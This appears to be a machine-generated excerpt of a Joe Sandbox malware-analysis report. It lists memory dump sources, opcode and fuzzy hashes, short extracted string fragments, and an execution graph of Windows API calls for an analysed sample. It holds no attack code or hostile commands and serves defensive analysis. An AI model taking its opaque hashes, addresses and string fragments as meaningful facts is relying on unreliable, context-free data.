                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 614e6e10bb6a127553d43ba2fcea3109e4905a131258dc2b73099f3752491ab6
                                • Instruction ID: 29e73b28dc8f8680d6b9eb8e39aa9187eebe51e1ac8c453cd47748fb2c4299fe
                                • Opcode Fuzzy Hash: 614e6e10bb6a127553d43ba2fcea3109e4905a131258dc2b73099f3752491ab6
                                • Instruction Fuzzy Hash: 52D0127590120DEBDF00DFB8E9505DD77B9FB85100B1046A9D50997210EA726E059751
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c25a0b18aea9377b1104d6c4885819ca9aab5ae2205357b760a5a1d504011aa
                                • Instruction ID: 580b98666eac5e57cc03f7739e3d050aa23174030b5e2a1dd44a5e1f8d577270
                                • Opcode Fuzzy Hash: 6c25a0b18aea9377b1104d6c4885819ca9aab5ae2205357b760a5a1d504011aa
                                • Instruction Fuzzy Hash: 28E0C271D00208EFCF00DFB8E9004EC77B5FB85200B2043A9D40AE7210DA321E059B00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca0acbf8a5f05e5e18f3effc50b7b1ab0cece3023ce3c4b41724c6dca0064c64
                                • Instruction ID: 7d1c027543e0d295c7db82575723433ec98e21e85dbc71e0768fb5c4d3195cf0
                                • Opcode Fuzzy Hash: ca0acbf8a5f05e5e18f3effc50b7b1ab0cece3023ce3c4b41724c6dca0064c64
                                • Instruction Fuzzy Hash: 49D0677BB40008DFCB149F98E8409DDB7B6FB98221B548516E915A3264C6319921DB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 051e24b26c1c9269a912be8b563f10d614b8afadce740b141fd479e4d8d77e81
                                • Instruction ID: ff8939a3e8b30e40bb4d36214ce9464ae4be259de9648aa2ecc71862cc0a24c9
                                • Opcode Fuzzy Hash: 051e24b26c1c9269a912be8b563f10d614b8afadce740b141fd479e4d8d77e81
                                • Instruction Fuzzy Hash: 82C01239400707CBDF55F775F885599732BEEC0104744D531A0060E219FE7468464692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1906400077.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f40000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: PHq$PHq
                                • API String ID: 0-1274609152
                                • Opcode ID: 730f53c1bf10512b5a0a16e321bb64202badaa6397a9cf2f880e2faf2f378cf0
                                • Instruction ID: 790d5deecc15d4a35dd4ac1b61870f724a7dc13312e4fe2e13596a1e6ffbd0cb
                                • Opcode Fuzzy Hash: 730f53c1bf10512b5a0a16e321bb64202badaa6397a9cf2f880e2faf2f378cf0
                                • Instruction Fuzzy Hash: 62D1B634A00604CFDB14DF69C598AA9BBF1BF8D711F2580A8E806EB365DB31AD41DF60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: #HBF$w*S
                                • API String ID: 0-2996935253
                                • Opcode ID: 32740230dbabb744278d576c35c7528320a02a52c6aaced0bf8756a369b3843f
                                • Instruction ID: 64c1a3fc1ee5eeb60da2bae7f2ba27d29dc70752af81805128a171e6e524854c
                                • Opcode Fuzzy Hash: 32740230dbabb744278d576c35c7528320a02a52c6aaced0bf8756a369b3843f
                                • Instruction Fuzzy Hash: 5161E275E05209CFCB08CFA9D5845EEFBF2EF89311F24956AD419BB264D3309A818F64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: #HBF$#HBF
                                • API String ID: 0-136798975
                                • Opcode ID: 393681e92d26f86da4346175b6ff96233548f3a039626c0a78b4c2da00b3b268
                                • Instruction ID: aceae7397fc74113557e5f81380ceddb41c8fe6a54608c4bb84fab407aefef72
                                • Opcode Fuzzy Hash: 393681e92d26f86da4346175b6ff96233548f3a039626c0a78b4c2da00b3b268
                                • Instruction Fuzzy Hash: 7261E175E05209CFCB08CFA9D9845EEFBF2FB89311F24952AD419BB264D3309A418F64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-693420146
                                • Opcode ID: b5741f9ad5fb6fcf391e3186eda771b194ccec79ab7e9700167945bf1ebbb2d8
                                • Instruction ID: 8e995082c31301d8a3f298bda7241eff5d9354bdc5c8f720f19a2c7cfa748802
                                • Opcode Fuzzy Hash: b5741f9ad5fb6fcf391e3186eda771b194ccec79ab7e9700167945bf1ebbb2d8
                                • Instruction Fuzzy Hash: 916127B5D0560ADFCB04CFA9D5816AEFBB2BF88341F14802AD415BB384DB389A41DF94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: A{]z$}\%G
                                • API String ID: 0-4271377017
                                • Opcode ID: 402002e2e066bddbbb904865700a18248643396a02940b08006db895bda120e0
                                • Instruction ID: b20e99dfaff4d1b9326c2a47e049461df5fae02773f50a782e64b314065e32d6
                                • Opcode Fuzzy Hash: 402002e2e066bddbbb904865700a18248643396a02940b08006db895bda120e0
                                • Instruction Fuzzy Hash: 0C41DAB1E0420ADFDB08CFAAC5405AEFBF2BF89315F24D46AC515E7254E3349A819F64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: A{]z$}\%G
                                • API String ID: 0-4271377017
                                • Opcode ID: f4651500dd3e9eaa6a173d1c838fc98bef768f9291c831bba879bd5518f8e962
                                • Instruction ID: 81495161a4cf48aea882eeb0110719c5bda60824f3e748d63dc11fe4d01accbb
                                • Opcode Fuzzy Hash: f4651500dd3e9eaa6a173d1c838fc98bef768f9291c831bba879bd5518f8e962
                                • Instruction Fuzzy Hash: D641EBB1D0420ADFDB08CFAAC5405AEFBF2BB89315F24D42AC515F7254E7349A819FA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: F
                                • API String ID: 0-2945319695
                                • Opcode ID: 7fb8a580dd4423fc6007790ae10eefb6c72f00223408520d71f75d756524efd1
                                • Instruction ID: b83d725d0b3bab5ff43cd6a5d76a75938aca69077b888aab83e0d48df38c1bb9
                                • Opcode Fuzzy Hash: 7fb8a580dd4423fc6007790ae10eefb6c72f00223408520d71f75d756524efd1
                                • Instruction Fuzzy Hash: E862DF71F043148FCB04EBB9D8A479EBFB2AF8A300F5185AAD449E7355DA389C45CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: yS^Z
                                • API String ID: 0-4128205011
                                • Opcode ID: ed7152e3151905f54ff8bda5e93cddb7f2e56bc321620b23d5ea0358f9512345
                                • Instruction ID: 7856d7e0049842233d46661d5f2f065db970d1f38516bed3bff4788cf1f19dd7
                                • Opcode Fuzzy Hash: ed7152e3151905f54ff8bda5e93cddb7f2e56bc321620b23d5ea0358f9512345
                                • Instruction Fuzzy Hash: 3A71F2B4D0060ADFCB44CFA9D580AAEFBB2FF89311F148529D415EB254CB34A9829F95
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: yS^Z
                                • API String ID: 0-4128205011
                                • Opcode ID: 667997640fab717480e67e6682230dd676436519c4b0abf45fa1f6eaa961b405
                                • Instruction ID: 917415c722872bb70aa6dfd984b0be516e61e292ef7685d535f49aa9e8dbc6e1
                                • Opcode Fuzzy Hash: 667997640fab717480e67e6682230dd676436519c4b0abf45fa1f6eaa961b405
                                • Instruction Fuzzy Hash: B46115B5E0160ACFCB04CFA9D580AAEFBB2FF89311F148526D415E7354CB34A9829F95
                                Memory Dump Source
                                • Source File: 00000000.00000002.1906400077.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f40000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6ea85cb43a43260eca977b6c29c3ad3058a1d97a17c53a904fa062464259b19
                                • Instruction ID: 3761af5c28ddc754768f56019e19d266e151c513921ad4e9510e15201ce8b685
                                • Opcode Fuzzy Hash: f6ea85cb43a43260eca977b6c29c3ad3058a1d97a17c53a904fa062464259b19
                                • Instruction Fuzzy Hash: 50D1AD31B016018FDB29DB76C4507AE7BE6AF89714F14446EDA46CB2A1DF38EC01C750
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b296d51a53a08ea3ae862e4cb50f547491fe5299c0d457ab9ac69df8280bcb6
                                • Instruction ID: 6439a95e664fe312078e8266506064e09eaec5ee2aeb89f273814a1e590c34b0
                                • Opcode Fuzzy Hash: 6b296d51a53a08ea3ae862e4cb50f547491fe5299c0d457ab9ac69df8280bcb6
                                • Instruction Fuzzy Hash: 9212A2F24117468BE332DF66EA482893BF1F745318F648209D2621B2F9D7B8528BDF45
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ccdd63a8c5af3b9950b4937c0ff87450af5edad942acda346966e939ca84f39
                                • Instruction ID: f7d0d6ac6d2ba7c11b9a295585d6363590a9f9701d95745fcdf693cdccaad60e
                                • Opcode Fuzzy Hash: 2ccdd63a8c5af3b9950b4937c0ff87450af5edad942acda346966e939ca84f39
                                • Instruction Fuzzy Hash: D6E11935D2075A8ACB11EB64D990ADDF771FF96300F50879AE44A3B224EB706AC5CF41
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 824c131c479409c3a7694ea4b8087d84e0e7916315c0d43bf7765e080d162617
                                • Instruction ID: b28b4f806db2d72bcf87200331b8d22bfc8cde2de29995e01dfcc6ff847dfa86
                                • Opcode Fuzzy Hash: 824c131c479409c3a7694ea4b8087d84e0e7916315c0d43bf7765e080d162617
                                • Instruction Fuzzy Hash: 6DD1E635D2075A8ACB10EB64D990ADDF771FF95300F60C79AE54A3B224EB706AC5CB81
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d2479021207214fbeaf9f079fe7f1614d18f045ceb12e913cea9ce97200ce8f
                                • Instruction ID: fbb1a5b25e055fb55eda80b4f4c69b463918d5d52f6ea5b0292e5872aa7777d5
                                • Opcode Fuzzy Hash: 0d2479021207214fbeaf9f079fe7f1614d18f045ceb12e913cea9ce97200ce8f
                                • Instruction Fuzzy Hash: 12B1F571E15329CFDF14CFA9D9446ADFBB2FB89302F20952AD409AB394E77499018F24
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b5525564701e63bdcd619e1c09829ea4bb2c37b08362aefd20570e6937764384
                                • Instruction ID: 0a0070892f6abe324a68a4ebca86e6aa441552f4030d45cbca0cf13e8b30a2a3
                                • Opcode Fuzzy Hash: b5525564701e63bdcd619e1c09829ea4bb2c37b08362aefd20570e6937764384
                                • Instruction Fuzzy Hash: 97A16D32E0021A8FCF15DFB5C8485AEBBF2FF95301B15456AE909BB265DB31A916CF40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b380f9c0098c9c520c46b5e14ceb198390f40637288da26595f2d1b2eff2bdfa
                                • Instruction ID: 61202c9016948e05272ab395e0234fc25b36168cecb499c3793b7e720c2acc85
                                • Opcode Fuzzy Hash: b380f9c0098c9c520c46b5e14ceb198390f40637288da26595f2d1b2eff2bdfa
                                • Instruction Fuzzy Hash: 5DC1FCB24107458BE722DF66EA482897BF1FB85314F348319D1622B2F9D7B8568BCF44
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6a51a58ce01520824666dbd9414bba571d28580923834816bb95b115ff7d2a50
                                • Instruction ID: e1356034888f315abe5f64ed119646fd8d74ed4c7ef9be66693823c6e4c774c4
                                • Opcode Fuzzy Hash: 6a51a58ce01520824666dbd9414bba571d28580923834816bb95b115ff7d2a50
                                • Instruction Fuzzy Hash: 65A12D71E05229DFDB14CFA9C580AAEFBB2FF89201F24C199D419A7355D7309A41DF60
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1170cc37413877a6e9e846033ac3ea4cba18c2a62d493217061db47d86339bff
                                • Instruction ID: 7da68ca060f092f257fd665a2bbbc118c40c809ec6f54083d7e93081c63a6384
                                • Opcode Fuzzy Hash: 1170cc37413877a6e9e846033ac3ea4cba18c2a62d493217061db47d86339bff
                                • Instruction Fuzzy Hash: 76813335E11249DFCB08CFA9D48099EFBF2FF89211B14846AE418EB365DB30AA41CF51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8cc7de6ce346c0292221417515b308892740843b19aed9f6e69b86e30ae8438
                                • Instruction ID: d7c558445b3c106bf8851f036cca5490e385bab690085375e0fc2454b64aae9e
                                • Opcode Fuzzy Hash: f8cc7de6ce346c0292221417515b308892740843b19aed9f6e69b86e30ae8438
                                • Instruction Fuzzy Hash: 57814BB0E15619DFDB24CFA9D980A9EFBB2FF88201F24C1A9D809A7355D7309A41DF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: caf8b78909b4eec3b0c10c32872d8b1996b2e7f198958396e1b0ea9b60769084
                                • Instruction ID: dee81ed36e12a428e406c825a9f328d21cea71a099d6247d56f9b00791405b45
                                • Opcode Fuzzy Hash: caf8b78909b4eec3b0c10c32872d8b1996b2e7f198958396e1b0ea9b60769084
                                • Instruction Fuzzy Hash: F4712CB0E156199FDB24CFA9C980A9EFBF2BF89201F24C1A9D809A7355D7309A41DF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd1f58d94c48bbcc6917cc1c87a3cf80b8a68d98c08f4ce73bf516853cfaaf54
                                • Instruction ID: 71946dcdf5f8ce937f9462f31ee374584c2f5f2af5031f9acb6314dcae663e97
                                • Opcode Fuzzy Hash: cd1f58d94c48bbcc6917cc1c87a3cf80b8a68d98c08f4ce73bf516853cfaaf54
                                • Instruction Fuzzy Hash: F371E475E15609DFCB48CFA9D484A9EFBF1FF88211F148566E418AB364DB30AA41CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 057c4b4a08565195c0164fd4c6ee5e63ad9b79cdb072429c858dd0fcb488023a
                                • Instruction ID: 918042bfc4ca7ec564e2506d046dc830786696a629f82ac63b30826c57869219
                                • Opcode Fuzzy Hash: 057c4b4a08565195c0164fd4c6ee5e63ad9b79cdb072429c858dd0fcb488023a
                                • Instruction Fuzzy Hash: 4C610871E157588BEB19CF7B88487CABFB3EFC5214F14C1AA844CAB225DB314A468F51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef949d36952174ffd04f852d5a94b2e1ac5693fad0fa40c8920bd94d36d1bd59
                                • Instruction ID: e053bd0f9165c9bd31556aad3f68a8dbe3db371fbb3c68e4467ee732af5533a8
                                • Opcode Fuzzy Hash: ef949d36952174ffd04f852d5a94b2e1ac5693fad0fa40c8920bd94d36d1bd59
                                • Instruction Fuzzy Hash: 82514BB0E01219CFDB14CFAADA806AEFBB2FF89201F24C16AD419B7245D7745A41DF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca3ee9718ca2908dd3b25d2d41af3778cbbaef97869033f1f58f3cd7172deea7
                                • Instruction ID: 09baaf6a6915dd9f66bdc49623fb3f48e688b88174efd0fe503135093fc459fb
                                • Opcode Fuzzy Hash: ca3ee9718ca2908dd3b25d2d41af3778cbbaef97869033f1f58f3cd7172deea7
                                • Instruction Fuzzy Hash: 0A513BB0E012198FDB14CFA9CA805AEFBB2FF89201F24C56AD419F7285D7745A42DF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e7f9deba67f20d8563eea4edeb5c06595a8c6e411c4c5cd8cc528cb742dbcb6
                                • Instruction ID: 43184a6eeb448b776dc0ab1829ee3854c0780bec5ccf7b513a4b0dba3477635f
                                • Opcode Fuzzy Hash: 8e7f9deba67f20d8563eea4edeb5c06595a8c6e411c4c5cd8cc528cb742dbcb6
                                • Instruction Fuzzy Hash: 9D514A71E107188BEB68DF6B9D4479EFAF3AFC8301F14C1BA850CA6254EB740A858F11
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01c62b31c00bd97f7db9879cc054d79a43d96211db6320d7e32aa44628444167
                                • Instruction ID: 91854fbe72c8576134af52972ea6d2862277a5465e33b3c6691164e74056ccd2
                                • Opcode Fuzzy Hash: 01c62b31c00bd97f7db9879cc054d79a43d96211db6320d7e32aa44628444167
                                • Instruction Fuzzy Hash: 1941F8B5E0160ADFDB04CFAAC9405AEFBF2EF89311F24C16AC405A7254E7309A919F94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82c56245bb0fb0d6125701e783d214ab8b86f78ae538c422b1ac6b4ee47ab07c
                                • Instruction ID: 42d10e18f5ed7ade148afc6277cf833071a68d23fcf9c2241fb8778be33c8189
                                • Opcode Fuzzy Hash: 82c56245bb0fb0d6125701e783d214ab8b86f78ae538c422b1ac6b4ee47ab07c
                                • Instruction Fuzzy Hash: 8741B6B5E0120ADFDB44CFAAC9805AEFBF2AF88301F24C569C415A7254E7349A819F95
                                Memory Dump Source
                                • Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ed6db67767d9a4c78bb73f3b408d348f40cd988a70454766af3428a40774234
                                • Instruction ID: f6c1d0e78efa14a2b984816710cdaf37bd1acde111d1eb810db47ba5e6543ae0
                                • Opcode Fuzzy Hash: 5ed6db67767d9a4c78bb73f3b408d348f40cd988a70454766af3428a40774234
                                • Instruction Fuzzy Hash: F011BDB1E056589FEB58CF6B98446DEFAF3AFC9200F14C07AC508A6264DB3405458F51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: \;q$\;q$\;q$\;q
                                • API String ID: 0-2933265366
                                • Opcode ID: 5f3e47059cee25fe1ae1fd24f1965f7d0d98bde39d560f6ac3f9eae1d16898e0
                                • Instruction ID: 83e5dc3195f539c462c62814b5691f115812b8c07d3a61825d54fb3fbee3ce1b
                                • Opcode Fuzzy Hash: 5f3e47059cee25fe1ae1fd24f1965f7d0d98bde39d560f6ac3f9eae1d16898e0
                                • Instruction Fuzzy Hash: 530144327001198FC7359E2DC948A3577EAEFC9A68729416AE506CB371EA35EC428750

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:55
                                Total number of Limit Nodes:8
                                execution_graph 36253 2c1b490 36254 2c1b4be 36253->36254 36257 2c1aa5c 36254->36257 36256 2c1b4de 36256->36256 36258 2c1aa67 36257->36258 36259 2c1bc5f 36258->36259 36262 66653d0 36258->36262 36266 66653c1 36258->36266 36259->36256 36264 6665435 36262->36264 36263 6665898 WaitMessage 36263->36264 36264->36263 36265 6665482 36264->36265 36265->36259 36268 6665435 36266->36268 36267 6665898 WaitMessage 36267->36268 36268->36267 36269 6665482 36268->36269 36269->36259 36270 6661051 36274 6661072 36270->36274 36278 6661080 36270->36278 36271 666106a 36275 6661080 36274->36275 36276 66610c9 36275->36276 36277 666111a CallWindowProcW 36275->36277 36276->36271 36277->36276 36279 66610c2 36278->36279 36281 66610c9 36278->36281 36280 666111a CallWindowProcW 36279->36280 36279->36281 36280->36281 36281->36271 36282 2c1abf8 36283 2c1abfd 36282->36283 36284 2c1ac1b 36283->36284 36286 2c1d319 36283->36286 36287 2c1d323 36286->36287 36290 2c1d3fd 36287->36290 36291 6632e59 36287->36291 36297 6632e68 36287->36297 36290->36283 36292 6632e7d 36291->36292 36293 66330c4 36292->36293 36294 66334e8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36292->36294 36295 66334f8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36292->36295 36296 6633498 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36292->36296 36293->36290 36294->36292 36295->36292 36296->36292 36298 6632e7d 36297->36298 36299 66330c4 36298->36299 36300 66334e8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36298->36300 36301 66334f8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36298->36301 36302 6633498 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 36298->36302 36299->36290 36300->36298 36301->36298 36302->36298 36303 2c1ae78 DuplicateHandle 36304 2c1af0e 36303->36304 36305 6664518 36306 6664820 36305->36306 36307 6664540 36305->36307 36308 6664549 36307->36308 36311 6663994 36307->36311 36310 666456c 36312 666399f 36311->36312 36314 6664863 36312->36314 36315 66639b0 36312->36315 36314->36310 36316 6664898 OleInitialize 36315->36316 36317 66648fc 36316->36317 36317->36314
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499624443.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6660000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: >I'L
                                • API String ID: 0-3948173599
                                • Opcode ID: 1dd8998ca5443a2f348e5b8db37171336a6c74852cc439e3b1331d4fc85d0e95
                                • Instruction ID: a3e4869159984beea6c37481fddae04db32668ec178902daca922d5c7c88187d
                                • Opcode Fuzzy Hash: 1dd8998ca5443a2f348e5b8db37171336a6c74852cc439e3b1331d4fc85d0e95
                                • Instruction Fuzzy Hash: 59F14730E00209DFEB54DFAAD949B9DBBF2BF88304F158559E406AF365DB70A945CB80
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2499567202.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
